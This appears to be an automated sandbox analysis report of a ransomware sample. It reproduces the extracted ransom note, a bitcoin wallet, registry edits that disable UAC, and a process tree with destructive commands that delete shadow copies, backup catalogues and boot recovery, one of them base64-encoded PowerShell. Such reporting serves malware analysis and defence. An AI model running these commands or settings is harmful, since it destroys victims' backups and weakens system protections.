d418ca84ca4bb7db72d2b00f8d6225a57909e02f712c7b0e2d9cefb2e18d0737

Resubmissions

13-07-2024 09:54

240713-lxbx6swdmm 10

13-07-2024 09:50

240713-lvbvdsyapd 10

13-07-2024 09:46

240713-lr1dksyajd 10

Analysis

max time kernel
1678s
max time network
1145s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2024 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Size

1.3MB
MD5

ffce3f25a125b5dfcd96e92148b7d209
SHA1

a4c2bfa23b98471ac1ea7103e194cf6488a058ac
SHA256

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c
SHA512

7d0af9214e4cdabceab9abb2586288e0a42ef9b7a7abc1bc7f03c04cf48b6722eeeee4a476aaf2567feaacbc70fb3e6bf36aa1050b010ef68019b7e80886f823
SSDEEP

24576:1pa1z++i/OfNbXirk1nF1qfWk3w80geAcVW9CFnBOmp7BCr/otH5LSp+7I80w:zF+BZk6FnBOmp7BCr/G7I80

Score

10^/10

defense_evasion evasion execution impact ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\Documents\How Do I Recover My Files (Readme).txt

Ransom Note

* What happened to my files? Your important files are encrypted. Many of your documents, photos, videos, databases, and other files are no longer accessible because they are encrypted. Maybe you're busy finding a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service. However, if you want to use the programs of data recovery companies, please do not work on your original files, but make copies of them. Corruption of the actual files can cause irreversible damage to your data. * Can I Recover My Files? Sure. We guarantee that you can recover all your files safely and easily. But for this you need to send $300 worth bitcoins to our address. Even if you give money, Do not believe the people around you who say they will not give your files, I Have Enough Reference To Give You Confidence. I don't know about you, so there is no point in having bad feelings towards you, doing evil to you, my goal is just to earn an income from this business. * What about the guarantees? This is just a job. We never care about you and your deals. If we do not fulfill our work and obligations - no one will cooperate with us. If you do not believe us, tell us any 1 or 2 files with SIMPLE extensions (jpg, xls, doc, etc ... not databases!) And low size (max 1 mb) 1 or 2 file and following special public and private mzrevenge keys produced for you send us we will decrypt these files and send it back to you. This is our guarantee. * How to contact with you? You can write us to our mailbox: [email protected] Don't forget, check your "Spam" or "Junk" folder it you can't get more than 6 hours of answer. * How will the decryption process proceed after payment? After payment, we will send you our special decoder program by mail, just open it, then it will automatically decrypt all your files. but you need to pay for it and contact us. * So what is Bitcoin and how to get it? The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ If you are ready to pay the money we want, Bitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd These are public and private MZREVENGE decryption keys produced for you. If these keys are damaged, nobody can recovery your files. ============================{ PUBLIC MZREVENGE KEY }============================= MZRKEYPUBLICwoo5YMOkZsKmw6rDvCLDnBXCmARSMcOSbFvCmsOvehPCsjrDj08Hw4fDpMK2ZVBrPxXCk8OGw4ozw4JmfsKJwrYnMznCnk3CkcKFEsOtK8OZw6nCulDCssKow4k2dcOLw7ULXGdrT3DDssKRQcKmEsKMTDjCnsO3fsKaw6Jnwqg0fnjDu8K9wrXCqF7DkTwVw4pDwogWA8OpwppoMRXDuT1nehHDksK2MMKucVAmBsOmdcKowqgTwrbCv8K9w7cVZ8Kgw4TCnsKOcsKxw4FNOFnCv8OBw5Uqd8OGwqY/w6lRw4PCkT02w6TDpcKUw6k4LsOqQj3Ct8KPwpcmwrZ4w57Do8KxBcKHWEtYwp7CgcKuw586w4TCgMKFSDp4NsKaUMKOGjPCvcOGEXnDhMKIw7URQmjDpDYjwqcBwphiwqRrKCxvVsORw5gFwrRzasK+wp1va8KzA0Y6wpMmEhPClMKoWSVew7wQw4fCucORbcK5w6s9w5Bjw4LDqsONw4/Dn8KYw48ywph6wrI2YsOGwooUUDZnw67DvMODwoPCicOeKzLCtxw1RMK0w7DDgQ4TXsOvw6l6fMOnwrg6Z8K3w51LDMKpFDbDqcOnw6TDkGdjRcOSw4BxwooYCzxWw4o= ================================================================================= ============================{ PRIVATE MZREVENGE KEY }============================ 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 =================================================================================

Emails

[email protected]

Wallets

3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd

Signatures

UAC bypass 3 TTPs 4 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (174) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Drops file in Drivers directory 1 IoCs

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description ioc process

File created C:\Windows\System32\drivers\etc\host 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\host	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2484 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2484	sc.exe

Modifies registry class 1 IoCs

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exepowershell.exe

pid	process
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
5060	powershell.exe
5060	powershell.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

WMIC.exepowershell.exevssvc.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2364	WMIC.exe
Token: SeSecurityPrivilege	2364	WMIC.exe
Token: SeTakeOwnershipPrivilege	2364	WMIC.exe
Token: SeLoadDriverPrivilege	2364	WMIC.exe
Token: SeSystemProfilePrivilege	2364	WMIC.exe
Token: SeSystemtimePrivilege	2364	WMIC.exe
Token: SeProfSingleProcessPrivilege	2364	WMIC.exe
Token: SeIncBasePriorityPrivilege	2364	WMIC.exe
Token: SeCreatePagefilePrivilege	2364	WMIC.exe
Token: SeBackupPrivilege	2364	WMIC.exe
Token: SeRestorePrivilege	2364	WMIC.exe
Token: SeShutdownPrivilege	2364	WMIC.exe
Token: SeDebugPrivilege	2364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2364	WMIC.exe
Token: SeRemoteShutdownPrivilege	2364	WMIC.exe
Token: SeUndockPrivilege	2364	WMIC.exe
Token: SeManageVolumePrivilege	2364	WMIC.exe
Token: 33	2364	WMIC.exe
Token: 34	2364	WMIC.exe
Token: 35	2364	WMIC.exe
Token: 36	2364	WMIC.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeIncreaseQuotaPrivilege	2364	WMIC.exe
Token: SeSecurityPrivilege	2364	WMIC.exe
Token: SeTakeOwnershipPrivilege	2364	WMIC.exe
Token: SeLoadDriverPrivilege	2364	WMIC.exe
Token: SeSystemProfilePrivilege	2364	WMIC.exe
Token: SeSystemtimePrivilege	2364	WMIC.exe
Token: SeProfSingleProcessPrivilege	2364	WMIC.exe
Token: SeIncBasePriorityPrivilege	2364	WMIC.exe
Token: SeCreatePagefilePrivilege	2364	WMIC.exe
Token: SeBackupPrivilege	2364	WMIC.exe
Token: SeRestorePrivilege	2364	WMIC.exe
Token: SeShutdownPrivilege	2364	WMIC.exe
Token: SeDebugPrivilege	2364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2364	WMIC.exe
Token: SeRemoteShutdownPrivilege	2364	WMIC.exe
Token: SeUndockPrivilege	2364	WMIC.exe
Token: SeManageVolumePrivilege	2364	WMIC.exe
Token: 33	2364	WMIC.exe
Token: 34	2364	WMIC.exe
Token: 35	2364	WMIC.exe
Token: 36	2364	WMIC.exe
Token: SeBackupPrivilege	3928	vssvc.exe
Token: SeRestorePrivilege	3928	vssvc.exe
Token: SeAuditPrivilege	3928	vssvc.exe
Token: SeBackupPrivilege	4856	vssvc.exe
Token: SeRestorePrivilege	4856	vssvc.exe
Token: SeAuditPrivilege	4856	vssvc.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.execmd.execmd.exe

description	pid	process	target process
PID 3028 wrote to memory of 3116	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	cmd.exe
PID 3028 wrote to memory of 3116	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	cmd.exe
PID 3028 wrote to memory of 3116	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	cmd.exe
PID 3028 wrote to memory of 728	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	cmd.exe
PID 3028 wrote to memory of 728	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	cmd.exe
PID 3028 wrote to memory of 728	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	cmd.exe
PID 3028 wrote to memory of 5060	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	powershell.exe
PID 3028 wrote to memory of 5060	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	powershell.exe
PID 3028 wrote to memory of 5060	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	powershell.exe
PID 3116 wrote to memory of 2484	3116	cmd.exe	sc.exe
PID 3116 wrote to memory of 2484	3116	cmd.exe	sc.exe
PID 3116 wrote to memory of 2484	3116	cmd.exe	sc.exe
PID 728 wrote to memory of 2364	728	cmd.exe	WMIC.exe
PID 728 wrote to memory of 2364	728	cmd.exe	WMIC.exe
PID 728 wrote to memory of 2364	728	cmd.exe	WMIC.exe
PID 3028 wrote to memory of 2004	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	NOTEPAD.EXE
PID 3028 wrote to memory of 2004	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	NOTEPAD.EXE
PID 3028 wrote to memory of 2004	3028	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe	NOTEPAD.EXE

System policy modification 1 TTPs 17 IoCs

evasion

Modify Registry

T1112

Processes:

020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1"	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext	020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
"C:\Users\Admin\AppData\Local\Temp\020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe"
1⤵
- UAC bypass
- Drops file in Drivers directory
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\SysWOW64\sc.exe
    sc config "AppCheck" start=disabled
    3⤵
    - Launches sc.exe
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:728
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5060
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\How Do I Recover My Files (Readme).txt
  2⤵
  PID:2004

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pe4n3eqk.fzz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Documents\How Do I Recover My Files (Readme).txt

Filesize
5KB

MD5
9886cc330dd14cd396747d25e2da3eea

SHA1
3d8c34784eac9fad6e76eb3f5eb33ae86530f062

SHA256
fd92fa855e45466bed2712c79c1e81b5ecb494f92a1c3e37f8230cf7efa4e31a

SHA512
e2d47e4c0c17077f384e1aaed92c50d6331dccde4a5b6b1be5d3e420572d1a86c8a7a62c53accf779a8c9822a1a12d7f57425c30f320cdcd759b0f70e4aa04b6

Download Submit
memory/3028-382-0x0000000000400000-0x0000000000561000-memory.dmp

Filesize
1.4MB

Download
memory/5060-99-0x00000000734F0000-0x0000000073CA0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-390-0x00000000734F0000-0x0000000073CA0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-102-0x0000000005520000-0x0000000005542000-memory.dmp

Filesize
136KB

Download
memory/5060-108-0x0000000005F90000-0x0000000005FF6000-memory.dmp

Filesize
408KB

Download
memory/5060-89-0x00000000057F0000-0x0000000005E18000-memory.dmp

Filesize
6.2MB

Download
memory/5060-78-0x0000000003030000-0x0000000003066000-memory.dmp

Filesize
216KB

Download
memory/5060-160-0x0000000006640000-0x000000000668C000-memory.dmp

Filesize
304KB

Download
memory/5060-90-0x00000000734F0000-0x0000000073CA0000-memory.dmp

Filesize
7.7MB

Download
memory/5060-107-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/5060-53-0x00000000734FE000-0x00000000734FF000-memory.dmp

Filesize
4KB

Download
memory/5060-157-0x00000000065F0000-0x000000000660E000-memory.dmp

Filesize
120KB

Download
memory/5060-383-0x0000000007580000-0x0000000007616000-memory.dmp

Filesize
600KB

Download
memory/5060-384-0x0000000007490000-0x00000000074AA000-memory.dmp

Filesize
104KB

Download
memory/5060-385-0x0000000007510000-0x0000000007532000-memory.dmp

Filesize
136KB

Download
memory/5060-386-0x0000000007BD0000-0x0000000008174000-memory.dmp

Filesize
5.6MB

Download
memory/5060-128-0x0000000006000000-0x0000000006354000-memory.dmp

Filesize
3.3MB

Download